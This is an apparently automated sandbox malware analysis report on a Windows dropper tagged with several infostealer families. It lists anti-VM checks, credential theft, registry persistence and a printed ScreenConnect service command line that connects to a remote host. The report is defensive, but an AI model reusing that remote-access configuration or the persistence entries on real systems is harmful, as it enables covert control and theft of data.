Malware Analysis Report

2025-04-03 09:37

Sample ID 250227-e6el4awqx3
Target daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe
SHA256 daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30
Tags
amadey lumma redline stealc systembc vidar 092155 a4d2cd ir7am reno testproliv credential_access defense_evasion discovery execution infostealer persistence privilege_escalation spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30

Threat Level: Known bad

The file daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe was found to be: Known bad.

Malicious Activity Summary

amadey lumma redline stealc systembc vidar 092155 a4d2cd ir7am reno testproliv credential_access defense_evasion discovery execution infostealer persistence privilege_escalation spyware stealer trojan

Detect Vidar Stealer

Systembc family

RedLine

Lumma Stealer, LummaC

Amadey family

Amadey

Lumma family

Stealc family

RedLine payload

Stealc

Vidar family

Redline family

SystemBC

Vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Uses browser remote debugging

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Blocklisted process makes network request

Sets service image path in registry

Reads user/profile data of local email clients

Executes dropped EXE

Checks BIOS information in registry

Loads dropped DLL

Reads user/profile data of web browsers

Identifies Wine through registry keys

Unsecured Credentials: Credentials In Files

Event Triggered Execution: Component Object Model Hijacking

Checks computer location settings

Reads data files stored by FTP clients

Enumerates connected drives

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Boot or Logon Autostart Execution: Authentication Package

Suspicious use of SetThreadContext

AutoIT Executable

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Unsigned PE

Program crash

Browser Information Discovery

System Location Discovery: System Language Discovery

Suspicious use of FindShellTrayWindow

Checks SCSI registry key(s)

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Uses Volume Shadow Copy service COM API

Checks processor information in registry

Delays execution with timeout.exe

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Kills process with taskkill

Modifies data under HKEY_USERS

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Scheduled Task/Job: Scheduled Task

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2025-02-27 04:32

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-02-27 04:32

Reported

2025-02-27 04:35

Platform

win10v2004-20250217-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

Stealc

stealer stealc

Stealc family

stealc

SystemBC

trojan systembc

Systembc family

systembc

Vidar

stealer vidar

Vidar family

vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ N/A N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (3be09d9e5e840c20)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (3be09d9e5e840c20)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=bbcnas2.zapto.org&p=8041&s=c702df34-cc7f-4684-be57-00a2effa70db&k=BgIAAACkAABSU0ExAAgAAAEAAQBdpn0O4B1VqMLUD0QDsNyYTlq4tRTm9ACUnnSMesFZALDh%2bLgBUwyTJ9D684SXejMRZmxv0Ws0vI2HDF%2f3pgx%2bIGwSyAZ%2fcl0w71rKbKyIIKYDZKbnkGgXvWGAi3ZyQp5OOPPQACb3KOn3dbHGC7zVR4YxQG18q4ph%2fyqoczab4g1p0ctN9m9IinVuQ4spX2nQNInOfCqxjvWdinItao7pk9fPOEV6qP3zSVfOwlnLHbRaASXeN%2fudvdB8e5o68h%2bjKG6VwXtszNJDCo7VtQqZmoYLmAVq9dmcJjckjVt0p%2bJPysj6usBrEV3AzT%2ff7W%2bYHYQ0svZBekSGOWFY8kLf&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAA%2buhuC0yR4EGoESmZ0s79XgAAAAACAAAAAAAQZgAAAAEAACAAAADdHjIJNBzn2DFJSB7eMvjIMhedK38hrzy7czFAxhNBggAAAAAOgAAAAAIAACAAAACKJC%2bduF0xytf8Ja5EYeeE3jr1NZtEp45ur39uVUAHcKAEAADp5rRi194QugjV5bM0Dbimv5OAD4HVNg1kIZsA9wLnHjeF0TARqYa0FBXlQoT2MNX1bQET8RtzKXTf3rfDYIyfu%2bM3jJZtYizoW3zUNlKQ8auNK3ucje449H%2brzb%2bessUXh7TKtmauj1FP%2flz5J27v0v7CfnR3WZvfoVd7V%2fQgp5uLQ84Ju3CmmgeCGSz%2bNS915Q0CKjVVTPm53MhBHZ%2fA01Ik9RIDwFM0SwCdqspY4WN5%2f0ykSpUPVFFSFH0TPuMAYaFuIcinIXJLwme3gGPe7nusogwO%2f8PR1n1DHxzd0%2bkePq%2fWvHrO%2fZ643BWh1SvXOr6Mj5M9kdW0HOa1iYOqYThcgZKLxRltlMr2F86061UDirbS4jodjb5oSE%2biQHTQ9Sv3z5q22gimrURp7WBka6Dj2BGx8HF97kG78XsHv8GUH0CwP6629pji9KezkK21ZrPZKHFOWSSsH0q%2b%2bVZvKMBp%2fy5rgtNPP0EdJxOdFNZCijqXBDiBSQXd3SvjzPca%2bQgGaqjHHA98Dc12OgPf7xfd0%2fn8p2hGvLBG9srjnRLcawtNDFOobSS69edpERMQ70I9oD085Fe5udpeR37Uveb3uHeDEwLHbrTtvDq5F9dNx8hXFb9R9IV7uxgMg5JH7RU8k7YTfZw1yZMPP34hEeIsayeSYOEPzCtHgesLADmkbRE4qlOmiZsRqhZI0zWyYaJDj0v%2b99n9JPBjIJqU2SaqbvvqK76gGIfvfFRRJyeF4%2bn6VR5TfQ8g13V4psVhFGJ5rBymTQpmCxLv3MO9cu1mLtRaDs3hL9YB5kUD5AhIzRPBs4FdylzEkyM%2f3w%2fYgmJsNeHCGozvFeOqXahWkHve5eqhWK52VzZAV3P%2f55FX%2bR811eHd9H%2fIU%2fq6Bb3C8OJpcpnMiAdwKVJAk719XtTEAwpC%2b3dPaddkJqR%2fcb8SYHiH4gRuXcYve8mvMtUj4NllsUTNKy44Qf15QIJDt5HXTondtkudoT1P32ICcyR%2bAXiCu36%2f1JhRQWnDfyT0bmxlXaJl%2bQt%2bxx80%2bakvOMuznud9yNyVxF6tXIuRrwbl7Dm9NmnSJK5fqzhxuocPgGtButsyGnHRM1PUjfyJtJH4005OBVpY40kHMDOFGOUJgPMQ5otX%2fgY25qj1VmRZv4Q7UAXh%2bFoApH%2bzWnGIYy%2bC3IW14SGHNloG9GLb6TTZWkGetv86wQCY6Trstg5BKb4dy7m2kAyWvKLBuxZHZJxvgBX4dpjNFEUGPX5evUqvnx%2fwzhITuRwiK45qs1x5n3PMGZZ4YiUwP%2bEy81lH1yyFn%2fuc2PAbMrf2LTNP6EbigE2VKbVDZcGMPvRyz2BVF3bMT5d1zQeP8MMrkcJosP2aa240KW9rFMHH0%2b%2bSSEgoJKxyRqMorLDN9Nqt189teNY9b5luRDwDjNnkjMatn5LfWNHxCJcAbYBtGVhFswtzHfvOxuKyi%2bG0x%2bIUHTwcNoAyaeNVnmUknekw%2ftBWkp7cTkUtnlKAzE9aExO%2f9pYEMAHZvLoCgaT%2flPaXRFuW3LQ6n3al0yPMYrKIfX8Hb5xlyLIXNjOOCWg7CGo3wEAAAADq6%2bUmLXU3OAHucKKOo7%2bCcIpeWRkMJaYfchWX%2bACEsS%2f3KVnTfmhEhJ%2bc4E8seRRX2CE0HhivKlACVwapUjmW&c=test&c=&c=&c=&c=&c=&c=&c=\"" N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion N/A N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation N/A N/A
Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation N/A N/A
Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation N/A N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10003000101\0aa5fc75e8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10003000101\0aa5fc75e8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine N/A N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine N/A N/A
Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10038770121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7cdb9b9956.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10038760101\\7cdb9b9956.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Boot or Logon Autostart Execution: Authentication Package

persistence privilege_escalation
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800330062006500300039006400390065003500650038003400300063003200300029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 C:\Windows\system32\msiexec.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3be09d9e5e840c20)\qhwphed4.tmp N/A N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3be09d9e5e840c20)\qhwphed4.newcfg N/A N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsFileManager.exe C:\Windows\system32\msiexec.exe N/A
